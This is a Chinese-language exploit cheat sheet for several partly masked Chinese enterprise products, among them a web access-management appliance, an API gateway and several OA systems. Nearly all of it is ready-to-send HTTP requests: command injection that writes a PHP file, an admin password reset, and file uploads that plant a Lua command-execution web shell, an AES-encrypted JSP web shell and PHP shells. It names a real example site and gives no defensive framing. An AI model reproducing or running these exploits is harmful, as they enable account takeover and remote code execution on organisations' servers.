某信-上网行为管理系统

一句话
/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20
echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a
Base64 版
/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20
echo%20PD9waHAgcGhwaW5mbygpOz8+%20%7Cbase64%20-
d%20%3E%3E%20/var/www/html/1.php%0a

某数据大脑 API 网关任意密码重置漏洞

某数据大脑 API(https://www.websaas.cn/)存在任意密码重置漏洞,这里以网站
https://waf-mgmt.pinganyun.com/q/#/为例:
在前端代码中包含重置密码的连接以及密码加密方式:
按照前端代码说明,构造重置密码数据包:
//此处重置的密码为:p@ssw0rd
POST /q/common-permission/public/users/forgetPassword HTTP/1.1
Host: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept-Language: en-US,en;q=0.5
Content-type: application/json
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 104
{"code":XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX,"rememberMe":false,"use
rname":"admin","password":"XXXXXXXXXXXXXXXXXXXXXXXXXX"}

某擎任意文件上传

/api/client_upload_file.json
POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456
78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1
Host: 192.168.11.210
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
(KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 323
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox
Q
Referer: http://192.168.11.210
Accept-Encoding: gzip
------WebKitFormBoundaryLx7ATxHThfk91oxQ
Content-Disposition: form-data; name="file"; filename="flash.php"
Content-Type: application/xxxx
if ngx.req.get_uri_args().cmd then
cmd = ngx.req.get_uri_args().cmd
local t = io.popen(cmd)
local a = t:read("*all")
ngx.say(a)
end------WebKitFormBoundaryLx7ATxHThfk91oxQ--

某户 OA /defaultroot/officeserverservlet 文

件上传

POST /defaultroot/officeserverservlet HTTP/1.1
Host: XXXXXXXXX:7001
Content-Length: 782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://XXXXXXXX7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li
ke Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
e/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cookie: OASESSIONID=CC676F4D1C584324CEFE311E71F2EA08; LocLan=zh_CN
Connection: close
DBSTEP V3.0 170 0 1000 DBSTEP=REJTVE
VQ
OPTION=U0FWRUZJTEU=
RECORDID=
isDoc=dHJ1ZQ==
moduleType=Z292ZG9jdW1lbnQ=
FILETYPE=Li4vLi4vdXBncmFkZS82LmpzcA==
111111111111111111111111111111111111111
<%@page import="java.util.,javax.crypto.,javax.crypto.spec.*"%><%!class U extends Class
Loader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.le
ngth);}}%><%if (request.getMethod().equals("POST")){String k="892368804b205b83";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec
(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE6
4Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContex
t);}%>
DBSTEP V3.0 170 0 1000
170 是控制从报文中什么地方读取
1000 是控制 webshell 源代码内容大小

某微 OA /workrelate/plan/util/uploaderOpe

rate.jsp 文件上传

POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 393
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="secId"
1
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="Filedata"; filename="testlog.txt"
Test
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="plandetailid"
1
------WebKitFormBoundarymVk33liI64J7GQaK— 2、将文件释放至跟网站根路径下 在数据包中将 fileid 替换
POST /OfficeServer HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 207
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="aaa"
{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'}
------WebKitFormBoundarymVk33liI64J7GQaK—

某微 eoffice10 前台 getshell(eoffice10/vers

ion.json)

版本号:http://XXXXXXX:8010/eoffice10/version.json

<form method='post'
action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
enctype="multipart/form-data" >
<input type="file" name="FileData"/></br></br>
<input type="text" name="FormData" value="1"/></br></br>
<button type=submit value="上传">上传</button> </form>

shell http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: XXXXXXXX:8010
Content-Length: 378
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/91.0.4472.77 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg
<?php echo md5(1);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FormData"
{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--